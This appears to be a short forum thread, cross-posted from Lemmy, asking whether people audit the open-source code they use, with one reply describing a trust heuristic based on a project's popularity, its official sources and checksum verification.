cross-posted from: https://lemmy.ml/post/30846701
The question is simple. I wanted to get a general consensus on if people actually audit the code that they use from FOSS or open source software or apps.
Do you blindly trust the FOSS community? I am trying to get a rough idea here. Sometimes audit the code? Only on mission critical apps? Not at all?
Let’s hear it!
I wouldn’t say blindly, rather my heuristic is, the most long term and popular a project is, the less I’ll bother.
If I do though get a random script from a random repository, rather than from say Debian official package manager from
main contribsources, then I will check.If it’s another repository, say Firefox from Mozilla or Blender then I won’t check but I’ll make sure it genuinely comes from there, maybe not a mirror or that the mirror does have a checksum that gets validated.
So… investment on verifying trust us is roughly proportional to how little I expect others to check.